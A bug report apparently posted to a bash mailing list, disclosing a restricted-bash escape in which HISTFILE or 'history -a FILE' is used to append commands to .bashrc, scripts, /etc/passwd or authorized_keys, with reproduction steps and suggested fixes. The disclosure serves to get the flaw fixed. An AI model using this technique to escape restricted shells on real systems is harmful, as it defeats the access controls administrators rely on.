[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Potential restricted bash escape by modifying history file
From: |
Diffie |
Subject: |
Potential restricted bash escape by modifying history file |
Date: |
Thu, 30 Apr 2020 14:22:31 -0400 |
User-agent: |
Cyrus-JMAP/3.3.0-dev0-351-g9981f4f-fmstable-20200421v1 |
Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security
-Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions
-fstack-protector-strong -grecord-gcc-switches
-specs=/usr/lib/rpm/redhat/redhat-hardened-cc1
-specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic
-fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection
-Wno-parentheses -Wno-format-security
uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC
2020 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-redhat-linux-gnu
Bash Version: 5.0
Patch Level: 11
Release Status: release
*Description:*
It is possible to write/append arbitrary content to files from a restricted
bash shell (with the privileges of the current user context) by tweaking the
HISTFILE variable, or by specifying a filename to "history -[a][w]". This does
not necessarily lead to a restriction bypass in all configurations, but does in
a few that come to mind:
* If the user can write to their home directory they can append arbitrary code
to .bashrc/other shell files. These shell files will execute the code without
restrictions on subsequent runs of rbash (assuming rbash is not being run in
posix mode, and that --norc is not being passed)
* If the user is root they can trivially get an unrestricted shell by modifying
/etc/passwd, etc.
* If the cwd contains an executable script that the user can write to, they can
append to the script with arbitrary code, then invoke this code from rbash:
"hash -p executable_script mal_command ; mal_command" (this could be possible
with an executable binary too, although would be a little more complex)
* SSH authorized keys, various other configs.
* etc...
Again, it will depend on the configuration, but this seems exploitable in most
configurations of rbash (one where it may be more difficult to exploit is when
the user is placed into a non-home directory chroot where they have limited
write access).
*Repeat-By:*
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc
[__RESTRICTED] bash-5.0$ history -c
[__RESTRICTED] bash-5.0$ /usr/bin/whoami
[__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command
names
[__RESTRICTED] bash-5.0$ history -a
[__RESTRICTED] bash-5.0$ exit
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie # whoami inserted into .bashrc above
[__RESTRICTED] bash-5.0$
OR without using HISTFILE variable
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc '
> /usr/bin/whoami
> '
[__RESTRICTED] bash-5.0$ exit
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie
[__RESTRICTED] bash-5.0$
*Fix:
*
* Disable writing to a specific file in rbash with "history -[a][w]
/tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge
cases here.
* Disable history in rbash altogether.
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- Potential restricted bash escape by modifying history file,
Diffie <=